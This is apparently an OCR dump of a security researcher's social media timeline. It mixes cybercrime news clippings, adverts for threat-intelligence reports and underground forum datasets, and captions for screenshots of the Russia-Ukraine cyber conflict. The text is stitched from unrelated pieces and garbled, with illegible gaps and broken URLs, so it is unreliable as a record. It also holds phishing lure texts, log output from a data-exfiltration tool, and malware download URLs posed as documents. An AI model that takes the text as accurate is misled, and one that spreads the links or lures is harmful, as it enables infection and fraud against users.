Grab today a free copy of the Second Free. Exposing Iran's Hacking Scene OSINT-Enabled Technical Collection Empowered and Visualized Report! Priced at $500 for an Unlimited Distribution Among Your Organization including Individual Researcher Use - This is the Most Comprehensive and Technically Sophisticated Analysis of Iran's Hacking Scene Up-to-Date! 

Commercial Copy Available! Approach me today! Approach your manager today! Empower your Threat Intelligence Team! An OSINT Conducted Today is a Tax Payer's Dollar Saved Tomorrow! 

https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 
Email: dancho.danchev@hush.com 
Technical Collection Data - Exclusive Copy Available! 


05:05 
https://t.co/JTcqOaYgET https://t.co/sHZpU77j55 


05:05 


05:06 


Cybercrime service automates creation of fake scanned IDs, other verification docs 

The service produces high-quality fake scans that can be used in fraud attacks to impersonate victims, Group-IB researchers said 

By Lucian Constantin 
Romania Correspondent, CSO 

A new Web-based service for cybercriminals automates the creation of fake scanned documents that can help fraudsters bypass the identity verification processes used by some banks, e-commerce businesses and other online services providers, according to researchers from Russian cybercrime investigations firm Group-IB. 

The service can generate scanned copies of passports, ID cards and driver's licenses from different countries for identities supplied by the service users, fake scanned utility bills from various companies, as well as fake scanned copies of banking statements and credit cards issued by a large number of banks, said Andrey Komarov, head of international projects at Group-IB, via email. 

It is common practice for banks, payment and money transfer providers, online gambling sites and other types of businesses that engage in money transactions via the Internet to ask their customers for scanned copies of documents in order to prove their identities or verify their physical addresses, especially when their anti-fraud departments detect suspicious account activity. 


https://t.co/JTcqOaYgET https://t.co/GmJNPUTIjM 


Mass website hacking tool alerts to dangers of Google dorks 

by Adam Greenberg, Senior Reporter 
November 05, 2012 

Google dorks are not geeks who love the internet-related services and products provider. Google dorks are akin to super-specific searches, which attackers have been known to take advantage of in attempts to expose vulnerable websites. 

Cyber crime researcher Dancho Danchev recently blogged about a mass, do-it-yourself (DIY) website-hacking tool making the rounds that takes advantage of those Google dorks. 

“The proxy supporting tool has been purposely designed to allow automatic mass websites reconnaissance for the purpose of launching SQL injection attacks against those websites that are vulnerable,” Danchev wrote. 

SQL stands for structured query language and is programming terminology designed for managing data. SQL injection typically involves an attacker inputting SQL statements into an entry field that will force the system to execute potentially malicious commands. 

“Once a compromise takes place, the attacker is in a perfect position to inject malicious scripts on the affected sites, potentially exposing their users to malicious client-side exploits serving attacks,” according to Danchev. 

Danchev wrote that an escalating number of DIY tools circulating the internet may open the door for novice attackers, but Barry Shteiman, director of security strategy with Imperva, told SCMagazine.com on Tuesday that it is the Google dorks that should be raising alarms. 


https://t.co/JTcqOaYgET https://t.co/eCoeQLpk9A 


PCWorld 

Fake CNN Alert Still Spreading Malware 

By Gregg Keizer 

The massive attack that has infected PCs by tricking users into clicking links in fake messages from CNN.com shows little sign of ending soon, security researchers say. 

According to MX Logic Inc., spam posing as CNN.com Top 10 lists peaked at [illegible] million messages per hour early Thursday, but remained at high volumes throughout the day Friday. The Colorado security vendor said it had been tracking an average of 8 million messages per hour since midnight. 

MX Logic's vice president of information security, [illegible], called the [illegible] trend “a very slow, but steady decline” from the 11 a.m. Mountain Time peak the day before. 

Masiello also said that the spam has changed since attacks were first launched on Tuesday. “We've also seen several morphs of this spam over the past couple of days,” he said in an entry posted on the MX Logic blog Friday. Where the messages once trumpeted “CNN.com Daily Top 10” [illegible], the spam sports a subject reading “CNN Alerts: My Custom Alert” and uses a variety of filenames in the malicious URL. 

“This is likely in response to all of the media attention and awareness that has been brought up over the past couple of days,” Masiello speculated. 

Also on Friday, Websense Inc. reported that its researchers had seen the attack mutating, with the spam subject heading not only touting “CNN Alerts: My Custom Alert” but also using legitimate news stories culled from CNN to make the messages more convincing. 

Users who clicked on the FULL STORY link in the message were redirected to a fake CNN site, where they were told they needed to download an update to Flash Player, Adobe Systems Inc.'s popular Internet media player, to view a video clip from CNN. 

Websense also said it had spotted traces of the campaign in blog spam. 

If users agreed to download the bogus Flash update, they were trapped in an endless loop, where clicking “Cancel” in the initial dialog produced a second pop-up. Clicking “Cancel” there returned the user to the first pop-up. The only options at that point were for users to shut down the browser or give in and install the malware. 

MX Logic added that it had seen the URLs in the spam lead to legitimate domains that had probably been compromised, and named a UK-based renting company as an example. 

Earlier this week, Bulgarian security researcher Dancho Danchev had found 


05:06 
https://t.co/JTcqOaYgET https://t.co/kiY4bEiEli 
This guide is for educational purposes only. I do not take any responsibility about anything that happens after reading the guide. I'm only telling you how to do this, not to do it. It's your decision. 
If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it, but don't change anything without the permission of the author. I'll be happy to see this text on other pages too. 

All copyrights reserved. You may distribute this text as long as it's not changed. 
Author Notes: 

I hope you like my texts and find them useful. 
If you have any problem or some suggestion feel free to e-mail me but please don't send mails like “I want to hack the US government please help me” or “Tell me how to bind a trojan into a .jpg” “Where can I get a portscanner” etc. 
Be sure if I can help you with something I will do it. 
I've started writing security related tutorials and I hope you like that. I'll try to cover much more topics in my future texts and I want to thank all of the people that like my texts. 
Dancho Danchev @dancho_.. - 11 Nov 20 
New Post - "Exposing Protonmail and Tutanota's Illicit Abuse by Ransomware Gangs - A Compilation of Currently Active Ransomware-Themed Email Addresses" - is.gd/NPLLg5 CC: @ProtonMail @TutanotaTeam #security #cybercrime #malware #Threatintelligence 

ProtonMail @ProtonMail 
Replying to @dancho_danchev and @TutanotaTeam 
Thanks for the report, we have zero tolerance for abuse and we'll investigate this and take the appropriate actions. 
17:52 - 11 Nov 20 - Twitter Web App 
https://t.co/JTcqOaYgET https://t.co/BxoLFMEvU5 




13:32 
https://t.co/JTcqOaYgET https://t.co/9tVL6hCanu 


Cybercrime service automates creation of fake scanned IDs, other verification docs 

Using image manipulation software to change the photo, name and other details on a scanned ID is obviously not a new practice, but services like the one identified by Group-IB that automate the whole process and produce high quality results are new on the cybercriminal market, Komarov said. 

According to Group-IB, the service is provided through a website hosted on a server in Germany. The domain name was registered in May, but the service wasn't launched until mid-August, Komarov said. 

Independent cybercrime researcher Dancho Danchev described a very similar service in a July blog post; however, Komarov could not confirm whether it is the same one because there was no reference to the service's domain name in Danchev's report. 

The service found by Group-IB has templates for passports, ID cards and driver's licenses for the U.S., Canada, Russia, the U.K., Germany, the Netherlands and other European Union countries. It also has templates for bank statements, credit cards - front and back - and utility bills from banks and utility companies [illegible] in those countries. 

The templates are for documents and cards that show signs of use and are scanned at different angles and different positions on the canvas. This makes the resulting image appear more authentic. 


13:33 
https://t.co/JTcqOaYgET https://t.co/dRJMVTO6GL 


23 - Wednesday 


17:44 


I just interviewed @michael_deebo - Go through the interview here - 
https://t.co/woirrT4y4V - who else do you think I should interview? Stay tuned for 
more upcoming interviews! Cheers and thanks Mike! #Threatintel 
#Threatintelligence 


26 - Saturday 


01:23 


RT @CHEN PR: Great interview with @Intel471Inc’s @michael_deebo on the current 
state of the #cybercrime ecosystem & the latest trends, tact... 


13:58 


https://t.co/NzsTDI4WA5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #CyberAttack #CyberSec #Threatintel #ThreatHunting 
#Threatintelligence #STIX #STIX2 #TAXII https://t.co/ka9yfciTte 


18:36 


https://t.co/tvPw6esTeM #security #cybercrime #malware #cyberattacks 
#CyberAttack #Cyberwar #CyberSecurity #Threatintelligence #Threatintel 
#ThreatHunting https://t.co/Qnb6éYtvVNO 


https://t.co/tvPw6esTeM #StopRussia #StopWar #StopTheWar 
#StopRussianAggression #RussianArmy #RussiaUkraineWar #RussiaUkraineConflict 
#russianinvasion #RussiaUkraine #RussiaInvadedUkraine #UkraineUnderAttack 
#UkraineWar #UkraineRussia #UkraineInvasion https://t.co/uUYHGvWgPBB 


[Image: screenshot of the Disbalancer 0.7.2-main client showing Client ID, Stats and Tasks]


20:39 


"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #security #cybercrime #malware #CyberAttack #CyberSec 
#CybersecurityNews https://t.co/KGissNYJOS 


20:40 


"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraine #RussiaInvadedUkraine 
#RussiaUkraineCrisis #RussiaInvadesUkraine #UkraineWar #UkraineRussia 
#UkraineRussiaConflict #UkraineRussiaCrisis https://t.co/IFamRoOHpz 


20:46 


"Exposing Anonymous International’s Hacking Collective Online Infrastructure - An 
OSINT Analysis" - https://t.co/oXIGJXhwC3 #security #cybercrime #malware 
#CyberAttack #CyberSec #CybersecurityNews https://t.co/Y9QChYcfGX 


"Exposing Anonymous International’s Hacking Collective Online Infrastructure - An 
OSINT Analysis" - https://t.co/oXIGJXhwC3 #RussianArmy #RussiaUkraine 
#RussiaInvadedUkraine #RussiaUkraineCrisis #RussiaInvadesUkraine #UkraineWar 
#UkraineRussia https://t.co/zTBYUvc3P] 


20:50 


"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #OSINTUkraine https://t.co/QWIg43yp4N 


"Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Four" - 
https://t.co/gkCKZbUKTA #Ransomware https://t.co/Xg600ZnHbL 


"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #RussiaUkraineConflict 
#russianinvasion #RussiaUkraine #RussiaReport #UkraineRussiaWar 
#UkraineUnderAttack #UkraineWar #UkraineRussia https://t.co/qgFVDu3vaqT 


23:48 


"The Current State of the Cyber War Between Russia and Ukraine — An OSINT 
Analysis" - https://t.co/aoQbXzDwXM #RussianArmy #RussiaUkraineWar 
#RussiaUkraineConflict #russianinvasion #RussiaUkraine #RussiaInvadedUkraine 
#UkraineRussiaWar #UkraineUnderAttack https://t.co/EnblvBpZcl 


https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussiaInvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/wRYldniLj4 


ANONYMOUS LIBERLAND 
AND THE PWN-BAR HACK TEAM 


About us 

Greetings citizens of the world. Let us introduce ourselves... We are the Pwn-Bar international 
hack team. We stand for equal opportunity pwnage and unrestrictec ss to information 

Our Russian APT friends seem kinda out of shape, don't they? Defacements? DDoS attacks? What 
year is this? 2012? 

We thought maybe they needed a little reminder of what real hacking is like, so we logged off 
Twitter to touch Shodan and we were xcked with what we saw. TI have the st secure cybers 
in entire world and we could not hack them. 

Hahaha, Just kidding... 

We announce the start of OpCyberBullyPutin. We are going to show you how prepared for cyberwar 
Russia and CIS countries fy are. 


We are Anonymous. We are a legion. We do not forgive. We do not forget. Expect us. 
News 


The Unitary Enterprise "Tetraedr" 

Country: Belarus, Category: Military-industrial complex 

The TETRAEDR UE is a scientific and industrial private unitary enterprise specializing in 
development and manufacture of advanced radio-electronic weapon system development and 
manufacture of hardware and software used in radar and radio electronic control asse 

upgrading of Air Defense Missile Systems. 

The TETRAEDR UE was founded on 26 April 26 state registration No 1962 The TETRAEDR UE 
is a full member of the Belarusian Chamber of Commerce and Industry. 

The TETRAEDR UE does not patch ProxyLogon in year 2022. The PWNBAR HT hacked them and copied 
their mailspools 

If you saw pictures from Russian state TV of missiles being fired at military training in 
Belarus, included are the schematics for some of those SAMS, and email threads that might be of 
interest to researchers of Belarusian involvement in the international arms trade. 


00:37 


https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussiaInvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/imhvaFoLDG 

[Screenshot: eng.mil.ru returning "This page isn't working"]

https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussiaInvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/inhFC3A3K0 

[Screenshot: traceroute checks against 95.72.229.228 from test locations in Australia (Perth), Austria (Salzburg), Canada (Toronto), France (Paris), Germany (Frankfurt), Hong Kong, Iran (Tehran), Italy (Milan), Kazakhstan (Karaganda), Lithuania (Vilnius), Moldova (Chisinau), Netherlands (Amsterdam), Portugal (Viana), Russia (Moscow), Switzerland (Zurich), Turkey (Istanbul), Ukraine (Khmelnytskyi, Kyiv) and USA (Los Angeles, New Jersey)]

https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussiaInvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/CoOVoVYHGS 

https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussiaInvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/jJM4BnTfwji 


[Screenshot: Disbalancer website, "New Generation of WEB3 Security"; "For Business" menu: Stress Testing, Token Launch, DDoS Protection, Consulting]

https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussiaInvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/iHjaxXRQ4tj 

00:38 


https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussiaInvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/pCVkphTnCg 

IT ARMY of Ukraine 
Let's shut down more news YouTube channels that openly lie about the war in Ukraine. 

YouTube channels: First channel, Russia 24, TASS, RIA Novosti 
[channel URLs not legible] 

YouTube-blogers: ZIMA LIVE [remaining entries and URLs not legible] 

How to report channels: 

- Turn on your laptop or desktop computer. 
- Turn on VPN as most channels are not available in Ukraine. 
- Sign in to your YouTube account. 
- Open the desired channel. 
- Go to the About tab. 
- Find the flag image and click on it. 
- Select the appropriate violation description from the drop-down menu. 

Russia MUST BE STOPPED! Help Ukraine WIN! 


00:49 


Big stuff. #Ukraine is currently crowd-sourcing #DDoS (Distributed Denial of Service) 
attacks against #Russia using a publicly accessible DDoS Tool called TheDisbalancer 
MD5: 9805b0891351cd760012ce02d738dc63 Detection rate here - 
https://t.co/53PCHAI299 https://t.co/3AwtLeiOps 

Another #DDoS attack tool in circulation in the #Russia and #Ukraine cyber war. 
MD5: f67f5d78f263ddf92749f09d3d478e4e VT: https://t.co/tE6uaEPtzr MD5: 
db8fdd09ed4a350cf509a241b76f46c1 https://t.co/KajflPgaSr hosted on @github - 
https://t.co/UxjPuD8S4K 


01:12 


Awesome! A flood of #DDoS attack tools hosted on @github in the #Russia and 
#Ukraine cyber war. https://t.co/fg6sQUaRzK; https://t.co/UxjPUD8S4K; 
https://t.co/jXpMsUmé8sgtsS; https://t.co/OUssOGUw1v; https://t.co/T32Ng8fsjG; 
https://t.co/dBNCllzZJy 

01:14 


Second batch of #DDoS attack tools hosted on @github in the #Russia and #Ukraine 
cyber war. https://t.co/ulQfvOUveV; https://t.co/dqB3glACli; https://t.co/Ei5qy230e2; 
https://t.co/OsOzwz9U2Q MD5: e346073eb932a3effff365ddb8070ac7 
https://t.co/sGsSYQUB65K 


09:00 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/GZzpFQMpTG5 

https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/WGv73ns8ng 

[Screenshot: report record, author DANCHO DANCHEV, dated February 10, 2022]


09:00 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/E4gDw6wC8H 

https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/OpKaBitYZn 

[Screenshot: list of STIX2 object types with truncated descriptions: Attack Pattern, Campaign, Course Of Action, Grouping, Identity, Incident, Indicator, Infrastructure, Intrusion Set, Location, Malware Analysis, Malware, Note, Observed Data, Opinion, Report, Threat Actor]

https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/eKKHD1cgg7 

https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/RrOrTmNWv5 

https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/lIOpAc3SsXv 

https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/JsvVPo8GX8 

https://t.co/OmUajr8DT8 https://t.co/291ruW7Vyo 

Sample Logo of Dancho Danchev’s OpenCTI STIX2/TAXII Maltego Transforms Compatible OpenCTI 
Instance Processing Hundreds of Never Published and Discussed Before Cybercrime Incidents and Threat 
Intelligence Events 


09:03 
https://t.co/OmUajr8DT8 https://t.co/o50nfwASdg 

- Malware 
- Cyber Jihad 
- Cyber Terrorism 
- Threat Actors 
- Phishing 
- Spam 
- IM malware 
- Mobile malware 
- Mac OS X malware 


09:04 
https://t.co/OmUajr8DT8 https://t.co/ursAkwPewl 

- Malicious URL Analysis - An Analysis 
- Targeted Mobile Malware Analysis - An Analysis 
- APT Coverage - New Campaign 
- Fraudulent Infrastructure - An Analysis 
- Online Fraud Campaign - An Analysis 
- Historical OSINT Campaign - An Analysis 
- Russian Business Network coverage 
- Koobface Botnet coverage 
- Kneber Botnet coverage 
- Hundreds of IOCs (Indicators of Compromise) 
- Tactics Techniques and Procedures In-Depth Coverage 
- Malicious and fraudulent infrastructure mapped and exposed 
- Malicious and fraudulent Blackhat SEO coverage 
- Malicious spam and phishing campaigns 
- Malicious and fraudulent scareware campaigns 
- Malicious and fraudulent money mule recruitment scams 
- Malicious and fraudulent reshipping mule recruitment scams 
- Web based mass attack compromise fraudulent and malicious campaigns 
- Malicious and fraudulent client-side exploits serving campaigns 

We Cover the Following Threat 
Intelligence Feed Categories 
Historically and in Real-Time 

- The Russian Business Network Coverage - Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of IoCs (Indicators of Compromise) and MD5s 

- Cyber Jihad Online Activities Coverage - Complete Qualitative and Incident and Campaign 
Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs 
(Indicators of Compromise) and MD5s 

- Proliferation of DIY Hacking Tools Coverage - Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of IoCs (Indicators of Compromise) and MD5s 

- The Rise of Rogue Antivirus Software Coverage - Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of IoCs (Indicators of Compromise) and MD5s 

- Cybercrime DIY Tools and Artifacts Coverage - Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of IoCs (Indicators of Compromise) and MD5s 

- Web Malware Exploitation Kits Incidents and Campaigns - Complete Qualitative and 
Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant 
Emails thousands of IoCs (Indicators of Compromise) and MD5s 

- Blackhat SEO Campaigns and Incidents - Complete Qualitative and Incident and Campaign 
Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs 
(Indicators of Compromise) and MD5s 

- Embedded Malware Campaigns and Incidents - Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of IoCs (Indicators of Compromise) and MD5s 


Who needs a 100GB Russian underground forums data set obtained using public 
sources in 2022? Drop me a line at dancho.danchev@hush.com I’m offering 50% 
discount to anyone who drops me a line today! Happy researching! Cheers! 
https://t.co/3s1Wx63SgX 

[Screenshot: archive listing: it-24h.com.rar, LinkFeed.rar, Linuxac.org.rar, Master-X.rar, MaulTalk.rar, Forum.Zloy.bz.rar, ForumSape.rar, ForumSEO.rar, Forum-UINSell.rar, Free-hack.rar, gerki.pw.rar]

Who needs a 100GB Russian underground forums data set obtained using public 
sources in 2022? Drop me a line at dancho.danchev@hush.com I’m offering 50% 
discount to anyone who drops me a line today! Happy researching! Cheers! 
https://t.co/A6BNGNIQQOW 

[Screenshot: folder listing of forum data sets: 11Wang, 365Exe, 419eater, 4HatDay, aHack, BlackhatWorld, BPCForum, Cardvilla, Chf, CNHonker, CNSec, Crack-Forum, Cracked.to, Cyberizm, Darkmarket.la, Darkmoney, DarkWeb, DomenForum, Eviloctal, Exelab, Forum-UINSell, Forum.Zloy.bz, ForumSape, ForumSEO, Free-hack, ghostmarket.net, Gla.vn, GoFuckBiz, gofuckbiz.com, H4kurd.com, Hack-Port, Hackings, iHonker, LinkFeed, Linuxac.org, Master-X, MasterWebs, MaulTalk, Mmpg.ru, Mr11-11mr.7olm.org, Nullnoss.org, pay-per-install.org, PhreakerPro, Piratebuhta.pw, ProCrd, ProLogic, Promarket, ProxyBase, SEOForum, ShadowMarket, SkyFraud, Spyhackerz, Svuit.vn]

# | IP | Country | City | Region | ISP | Org | Latitude | Longitude
1 | 45.14.226.47 | Netherlands | Amsterdam | North Holland | [not legible] | SKB Enterprise B.V | 52.3759 | 4.8975
2 | 75.151.48.49 | United States | Madison | Tennessee | Comcast Cable Communications | Stones Riverelectric | 36.2562 | -86.7143
3 | 96.93.217.253 | United States | Littleton | Colorado | Comcast Cable Communications, LLC | Comcast Cable Communications, LLC | 39.6133 | -105.017
4 | 173.163.176.177 | United States | Wilkes-Barre | Pennsylvania | Comcast Cable Communications | SALE'S MARTIN'S | 41.1988 | -75.9053
5 | 184.146.91.74 | Canada | Amhertsburg | Ontario | Bell Canada | Sympatico HSE | 42.1168 | -83.0498
6 | 73.128.248.22 | United States | Baltimore | Maryland | Comcast Cable Communications | Comcast IP Services, LLC. | 39.3046 | -76.6412
7 | 73.31.89.221 | United States | Bluefield | West Virginia | Comcast Cable Communications | Comcast IP Services, LLC. | 37.2697 | -81.2212
8 | 162.244.81.252 | United States | New York | New York | Data Room, Inc | Data Room, Inc | 40.7128 | -74.006
9 | 172.83.155.195 | United States | Seattle | Washington | Spartan Host LLC | TMT Hosting | 47.4902 | -122.3004
10 | 195.123.214.177 | Latvia | Riga | Riga | ITLDC Latvia network | Green Floid LLC | 56.9496 | 24.0978
11 | 75.147.147.133 | United States | Cape Coral | Florida | Comcast Cable Communications, LLC | Comcast Business Communications, LLC | 26.6786 | -82.0263
12 | 186.72.79.132 | Panama | Panama City | Provincia de Panama | Cable & Wireless Panama | Cable & Wireless Panama | 8.9948 | -79.523
13 | 128.199.196.59 | Singapore | Singapore | Unknown | DigitalOcean, LLC | Digital Ocean | 1.32123 | 103.695
14 | 38.88.223.172 | United States | Los Angeles | California | Cogent Communications | Cogent communications - IPENG | 34.0522 | -118.244

04:01 

"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
https://t.co/PFpmjFOHQN #Conti #Ransomware #security #cybercrime #malware 
#cyberattacks #CyberAttack #CyberSecurity #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/jXEtLf}Qk2 

IP | Country | City | Region | ISP | Org | Latitude | Longitude
5.2.78.121 | Netherlands | Amsterdam | North Holland | The infrastructure Group B.V. | Liteserver DORN VPS | 52.3676 | 4.90414
195.149.87.233 | United States | Secaucus | New Jersey | innovation IT Solutions LTD | PQ HOSTING S.R.L | 40.7876 | -74.06
185.158.249.249 | Netherlands | Naaldwijk | South Holland | servinga GmbH | ALLSYS Limited | 51.9981 | 4.198
31.214.157.242 | Netherlands | Naaldwijk | South Holland | servinga GmbH | servinga GmbH | 51.9981 | 4.198
38.92.176.125 | United States | Minneapolis | Minnesota | Madgenius.com | Mad Genius | 44.9715 | -93.2703
195.123.219.82 | Netherlands | Meppel | Drenthe | ITLDC Netherlands network | Layer6 Networks | 52.6959 | 6.1847
185.158.249.119 | Netherlands | Naaldwijk | South Holland | servinga GmbH | ALLSYS Limited | 51.9981 | 4.198
23.146.242.134 | United States | Chinchilla | Pennsylvania | VolumeDrive | VolumeDrive | 41.4873 | -75.6966
51.38.95.29 | United Kingdom | London | England | OVH SAS | EL Zayat Hadi | 51.5074 | -0.127758
46.19.136.221 | Switzerland | Zurich | Zurich | Airvpscomp Vpsprovider | Unknown | 47.3538 | 8.5587
142.4.211.167 | Canada | Beauharnois | Quebec | OVH SAS | OVH Hosting, Inc. | 45.3151 | -73.8779
195.123.221.248 | Netherlands | Meppel | Drenthe | ITLDC Netherlands network | Layer6 Networks | 52.6959 | 6.1847
37.187.24.215 | France | Gravelines | Hauts-de-France | OVH SAS | OVH SAS | 50.9871 | 2.12554
5.34.181.18 | Netherlands | Meppel | Drenthe | VDS/VPS SERVERIUS NL | Unknown | 52.6959 | 6.1847
194.76.225.152 | Netherlands | Naaldwijk | South Holland | servinga GmbH | servinga GmbH | 51.9981 | 4.198

[+] WinSock initialized 
[+] IO completion port initialized... 
Check server 139.606.160.200... 
[+] Server connected ... 
Stats: @ files <size 20.9 MB>, read speed 4.18 MB/sec <compression ratio 91%>, upload 6 bytes/sec 
Stats: 71 files <size 529 MB>, read speed 26.4 MB/sec <compression ratio 99%>, upload 8.31 MB/sec 
Stats: 166 files <size 2.17 GB>, read speed 27.8 MB/sec <compression ratio 99%>, upload 22.9 MB/sec 
Stats: 266 files <size 3.75 GB>, read speed 27.4 MB/sec <compression ratio 99%>, upload 25.6 MB/sec 
Stats: 336 files <size 5.36 GB>, read speed 27.4 MB/sec <compression ratio 99%>, upload 25.6 MB/sec 

Amazon 30th Anniversary Celebration 

Amazon's 30th Anniversary Celebration is coming to an end. 
Last stage of the raffle for a USD 10-200 gift card and other prizes 

To participate in the raffle, you need to download the Lottery App and generate a unique code 

How to take part in the raffle? 

2. Run the application. The application will generate a code to participate in the lottery 

Apple 
Hello! 

We are asking for your help. Please check the information in the generated 
invoice I provide. Your email provider rejects a letter with attachments. 
So, 
the personal cloud, here is the link: 

Provide all the related information as soon as you can. 

Full dumps 

ted here companies do not wish to with us, and trying t 

Wait for them private papers here 

P.S. We have the second domain: newsmaze.top 

Read more 
https://nhai.gov.in/ 
Article about National Highways Authority of India have been locked 

Read more 
https://nhai.gov.in/ 
Article about National Highways Authority of India have been locked 

Read more 
https://nhai.gov.in/ 
Article about National Highways Authority of India have been locked 

[Screenshot: Windows Explorer open on a Downloads subfolder containing a 236 KB application, with the dialog "cmd.exe - Application Error: The application was unable to start correctly (0xc0000005). Click OK to close the application"]

SQLSTATE[42S22]: Column not found: 1054 Unknown column 'api_token' in 'field list' 

Illuminate\Database\QueryException 
Doctrine\DBAL\Driver\PDOException 
PDOException 
PDO prepare 

Response Headers 

Cache-Control no-cache, private 
Connection Keep-Alive 
Content-Length 2 
Content-Type application/json 
Date Mon, 29 Jun 2020 13:55:53 GMT 
Keep-Alive timeout=5, max=100 
Server Apache/2.4.2 (Win64) PHP/7.3.13 OpenSSL/1.0.1c 
X-Powered-By PHP/7.3.13 
X-RateLimit-Limit 60 
X-RateLimit-Remaining 59 

Request Headers 

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Encoding gzip, deflate, br 
Accept-Language en-US,en;q=0.5 
Connection keep-alive 
Host a3ggjhcskbjg36bx.onion 
Upgrade-Insecure-Requests 1 
User-Agent Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 

[Screenshot: Avast Business Antivirus "Personal Privacy" settings, listing the options to share threat data and app-usage data with Avast and with 3rd-party analytics tools]

Protection history 
View the latest protection actions and recommendations from Windows Security. 

Threat found - action needed. Severe 
7/14/2020 11:13 AM 
Status: Active 
Active threats have not been remediated and are running on your device. 

Threat detected: Trojan:Win32/Ulthar.A!ml 
Alert level: Severe 
Date: 7/14/2020 11:13 AM 
Category: Trojan 
Details: This program is dangerous and executes commands from an attacker. 

Affected items: 
file: C:\Users\Administrator\Downloads\DocumentPreview (13).exe 
webfile: C:\Users\Administrator\Downloads\DocumentPreview (13).exe|about:internet|pid:3276,ProcessStart:132391659341593689 

https://t.co/Psy98IDRla 

Document_BritishAirways (2).exe 
https://www.shiningshadowllc.com/Document_BritishAirways.ex 

Rexe 
http://194.5.249.13/Pexe 
This file is not commonly downloaded and may be dangerous 

Document_BritishAirways (1).exe 
https://www.shiningshadowllc.com/Document_BritishAirways.ex 
This file is dangerous, so Chrome has blocked it 

@SOufi4n3 @hacks4pancakes @CoreSecurity @SOSIntel @Cyberknow20 
https://t.co/vSCjG6FXyB 
2 

@BrettCallow https://t.co/vSCjG6FXyB 

@likethecoins https://t.co/vSCjG6FXyB 
*1 

@LawrenceAbrams https://t.co/vSCjG6FXyB 

@VK_Intel https://t.co/vSCjG6FXyB 

@Malwarenailed @VK_Intel @malwrhunterteam @AShukuhi https://t.co/vSCjG6FXyB 

@Cyberknow20 @AShukuhi @BrettCallow @SOSIntel @pancak3lullz @SOufi4n3 

@SOufi4n3 @ValeryMarchive @ransomwaremap @uuallan @GossiTheDog 

March 


1 - Tuesday 
01:05 
@darkowlcyber https://t.co/vSCjJG6FXyB 
*3 
02:55 
https://t.co/Cvb6i70jN5 [PDF] https://t.co/wle7LSZaLR 
Chapter 1 
Intelligence 
The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns including Botnet and 
